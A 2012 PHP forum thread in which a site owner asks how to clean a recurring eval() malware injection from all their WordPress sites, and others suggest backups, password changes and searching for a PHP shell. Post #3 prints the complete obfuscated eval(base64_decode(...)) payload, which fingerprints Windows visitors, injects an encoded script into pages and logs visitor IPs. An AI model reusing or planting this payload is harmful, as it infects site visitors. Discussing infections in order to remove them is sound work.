All my sites in my server is affected by some sort of eval() code now what to do

Discussion in 'PHP' started by NewsClerks, Jul 22, 2012.

0
  1. #1
    Hello friends,
    all my sites in one of my hosting account has been affected by a random malware with eval code on it.

    all index files are affected by it.
    tried to remove them manually but the abnormal code comes back.
    antivirus is blocking my sites for that.

    BTW: in the same server I have another hosting account and those are not affected.

    Any suggestion to tackle this problem.

    The sites are in WP platform
     
    NewsClerks, Jul 22, 2012 IP
  2. rainborick

    rainborick Well-Known Member

    Messages:
    424
    Likes Received:
    33
    Best Answers:
    0
    Trophy Points:
    120
    #2
    Search on "remove malware from website" and you should find some good advice. It generally requires deleting all of the files from your server and restoring them from known, clean back-ups *after* you've insured that your own computer is virus-free and you have changed all of the passwords to your FTP accounts. Finally, you need to be sure that you've updated all of the scripts on your site like blogs, forums, galleries, etc. Good luck!
     
    rainborick, Jul 22, 2012 IP
  3. NewsClerks

    NewsClerks Peon

    Messages:
    255
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #3
    I forgot to mention I don't have current backup for all sites.
    I only have months old backup.

    The Code looks like this: 
    <?php
eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTskZGJmPSRkci4nLycubWQ1KCRkcik7DQppZigoc3RycG9zKCR1YSwnV2luZG93cycpIT09ZmFsc2UpJiYoKHN0cnBvcygkdWEsJ01TSUUnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKSkmJihzdHJwb3MoQGZpbGVfZ2V0X2NvbnRlbnRzKCRkYmYpLCRpcCkgPT09IGZhbHNlKSl7DQoJZXJyb3JfcmVwb3J0aW5nKDApOw0KCWVjaG8oYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkRDUwY25sN01TMXdjbTkwYjNSNWNHVTdmV05oZEdOb0tHRnpaQ2w3ZUQweU8zMGdhV1lvZUNsN1puSTlJbVp5YjIxRGFHRnlJanRtUFZzd0xDMHhMRGswTERrekxESXlMREk1TERreExERXdNU3c0T0N3eE1EZ3NPVGtzT1RBc01UQXhMREV3Tml3ek5TdzVOQ3c1TVN3eE1EVXNOakFzT1Rnc09UQXNNVEF3TERreExEazVMREV3Tnl3eE1EVXNOVFVzTVRFeUxEYzBMRGcyTERrMExEWTRMRGcyTERFd01DdzVNU3d5T1N3ek1DdzRPQ3d4TURBc09URXNNVEV4TERJNExETXlMRGd4TERNM0xEZzBMRE14TERFeE1pdzBMQzB4TEMweUxEQXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXcwT1N3eUxEQXNMVEVzTVRFMExESXpMRGt4TERrM0xERXdOaXc1TVN3eU1Td3hNVFFzTXl3dE1pd3dMQzB4TERnNUxERXdNaXc0T1N3eE1EWXNNVEF3TERreExEazVMREV3Tnl3ek5pd3hNRGdzTVRBMUxEazFMREV3TlN3NU1pd3pNQ3d5TXl3MU1TdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNNaklzTVRBMExERXdOU3c0T1N3MU1Dd3pNQ3c1TkN3eE1EVXNNVEEzTERFd01pdzBOeXd6T0N3ek55dzROaXc1TkN3eE1EQXNNVEEzTERFd09Dd3hNRGtzTVRBekxEa3hMREV4TVN3eE1EZ3NNemNzT0Rnc01URXdMRGsyTERFd01Dd3hNRFVzT1RJc01UQTBMRE0xTERFd01TdzVNU3d4TURVc016Z3NOVE1zT1RJc01UQXlMRFV4TERNNUxETXdMREl5TERFd09DdzVOaXc1TUN3eE1EVXNPVFVzTlRFc01qZ3NOREFzTXpnc01qZ3NNak1zT1RRc09UQXNPVFlzT1RNc09UTXNNVEEzTERVeExESTRMRFF3TERNNExESTRMREl6TERFd05Td3hNRFVzTVRFeUxEazRMRGt3TERVeUxESTVMREV3Tnl3NU5pd3hNRFVzT1RRc09Ea3NPVFVzT1Rjc09UWXNNVEEyTERFeE1DdzBPU3c1TkN3NU5DdzVNU3c1TUN3NU1Dd3hNREVzTkRrc01UQXhMREV3TWl3eE1EVXNPVFFzTVRBM0xEazFMREV3TUN3eE1ERXNORGdzT0RZc09Ea3NNVEExTERFd01DdzVPU3d4TURjc01UQTFMRGt5TERRNUxEazNMRGt5TERreUxERXdOU3cwT1N3ek9DdzBPQ3d4TURjc01UQXhMREV3TVN3ME9Td3pPQ3cwT0N3ek1DdzFNaXcwT1N3ek9DdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNOVElzTWpNc016SXNORGtzTWl3d0xDMHhMREV4TkN3MExDMHhMQzB5TERrekxERXdOeXc1T1N3NU1Dd3hNRFlzT1RRc01UQXlMREV3TUN3eU1TdzVOaXc1TWl3eE1ETXNPRGdzT1Rrc09UQXNNVEExTERNd0xETXdMREV4TkN3ekxDMHlMREFzTFRFc01UQTNMRGc0TERFd05Dd3lNU3c1TXl3eU1pdzFNQ3d5TXl3NU1Dd3hNREFzT1RBc01UQTNMRGs0TERreUxERXdNQ3d4TURVc016Y3NPRGtzTVRBekxEa3lMRGczTERFd05TdzVNaXcxT1N3NU55dzVNaXc1T1N3NU1Dd3hNREVzTVRBMkxESTVMRE13TERrMUxEa3hMREV3TlN3NE55dzVPQ3c1TWl3eU9Td3pNQ3cxTUN3NU1pd3pOU3d4TURZc09URXNNVEExTERVMkxERXdOaXd4TURVc01UQTFMRGsxTERnM0xERXdPQ3d4TURZc09UQXNNekVzTWprc01UQTBMREV3TlN3NE9Td3lPQ3d6TlN3eU9TdzVNeXd4TURjc01UQTJMREV3TVN3ME9Td3pOeXd6Tml3NE9DdzVNeXc1T1N3eE1Ea3NNVEEzTERFd09Dd3hNRFVzT1RBc01URXdMREV4TUN3ek5pdzROeXd4TVRJc09UVXNPVGtzTVRBM0xEa3hMREV3TXl3ek55d3hNREFzT1RBc01UQTNMRE0zTERVeUxEazBMREV3TVN3MU1DdzBNU3d5T1N3ek1DdzFNQ3c1TWl3ek5Td3hNRFlzTVRBMkxERXhNQ3c1T1N3NU1Td3pOU3d4TURrc09UVXNNVEEwTERrMkxEZzRMRGswTERrNUxEazFMREV3TlN3eE1USXNOVEVzTWpnc09UVXNPVFVzT0Rrc09URXNPVEVzT1Rrc016QXNORGtzT1RFc016Y3NNVEExTERFd05Td3hNVElzT1Rnc09UQXNNemNzTVRBeUxERXdNQ3d4TURZc09UVXNNVEExTERrMkxERXdNU3c1T1N3MU1pd3lPU3c0Tml3NE9Td3hNRFVzTVRBd0xEazVMREV3Tnl3eE1EVXNPVElzTWprc05EZ3NPVE1zTXpZc01UQTBMREV3Tnl3eE1URXNPVGNzT1RJc016WXNPVGNzT1RJc09USXNNVEExTERVeUxESTVMRE0zTERNd0xEUTVMRGt4TERNM0xERXdOU3d4TURVc01URXlMRGs0TERrd0xETTNMREV3Tml3eE1EQXNNVEF6TERVeExESTRMRE01TERJNUxEUTRMRGt6TERNMkxERXdOQ3c1TWl3eE1EWXNOVFFzTVRBM0xERXdOaXd4TURNc09UWXNPRGdzTVRBMkxERXdOeXc1TVN3eU9Td3pNQ3d4TURrc09UUXNPVEVzTVRBMkxEa3pMRE13TERNMExESTRMRFF3TERNNExESTRMRE15TERRNUxEa3hMRE0zTERFd05TdzVNQ3d4TURjc05UVXNNVEExTERFd055d3hNRFFzT1RRc09Ea3NNVEEzTERFd05TdzVNaXd6TUN3eU9DdzVOU3c1TVN3NU5DdzVOQ3c1TkN3eE1EVXNNekFzTXpRc01qZ3NOREFzTXpnc01qZ3NNeklzTkRrc01pd3dMQzB4TEMweUxEa3hMREV3TVN3NE9Dd3hNRGdzT1Rrc09UQXNNVEF4TERFd05pd3pOU3c1TkN3NU1Td3hNRFVzTmpBc09UZ3NPVEFzTVRBd0xEa3hMRGs1TERFd055d3hNRFVzTlRVc01URXlMRGMwTERnMkxEazBMRFk0TERnMkxERXdNQ3c1TVN3eU9Td3pNQ3c0T0N3eE1EQXNPVEVzTVRFeExESTRMRE15TERneExETTNMRGcwTERNMkxEZzJMREV3TXl3eE1ESXNPVEFzTVRBeExEa3dMRFUyTERrMUxEazFMRGszTERreExETXdMRGt4TERNeUxEUTVMRElzTUN3dE1Td3hNVFJkTzNZOUltVjJZU0k3ZldsbUtIWXBaVDEzYVc1a2IzZGJkaXNpYkNKZE8zYzlaanR6UFZ0ZE8zSTlVM1J5YVc1bk8zbzlLQ2hsS1Q4aVEyOWtaU0k2SWlJcE8zcDRQV1p5SzNvN1ptOXlLR2s5TURzMU56a3ROU3MxTFdrK01EdHBLejB4S1h0cVBXazdhV1lvWlNselBYTXJjbHQ2ZUYwb0tIZGJhbDBxTVNzb09TdGxLQ0pxSlRNaUtTa3BLVHQ5SUdsbUtIZ21KbVltSmpBeE1qMDlQVEV3S1dVb2N5azdQQzl6WTNKcGNIUSsnKSk7DQoJaWYgKCRmcCA9IEBmb3BlbigkZGJmICwgImEiKSl7ZnB1dHMoJGZwICwgJGlwLid8Jyk7IGZjbG9zZSgkZnApO30NCn0='));?>
    Code (markup):
     
    NewsClerks, Jul 22, 2012 IP
  4. MarPlo

    MarPlo Member

    Messages:
    97
    Likes Received:
    2
    Best Answers:
    2
    Trophy Points:
    48
    #4
    Hi
    From what i read on the net, the security problem in WP are the plugins.
    Try remove the untrasted plugins (use only from the official website), and change the password of FTP account and of Adimn in WP. Also, not use the "admin" name for administrator.
    Hope it helps.
     
    MarPlo, Jul 22, 2012 IP
  5. NewsClerks

    NewsClerks Peon

    Messages:
    255
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #5
    All my plugins are downloaded from official site.
    I can't detect the main script which is causing the problem.
    worked hard to edit all files affected by this but after some time those codes come back.
    I changed FTP,SQL and site control panel passward, any of them is not working.
     
    NewsClerks, Jul 22, 2012 IP
  6. samirj09

    samirj09 Well-Known Member

    Messages:
    335
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    125
    #6
    In that case, there is a phpshell embedded in one of your files that is allowing the intruder to continue to gain access. Shoot me a PM on this. Im sure I can help.
     
    samirj09, Jul 22, 2012 IP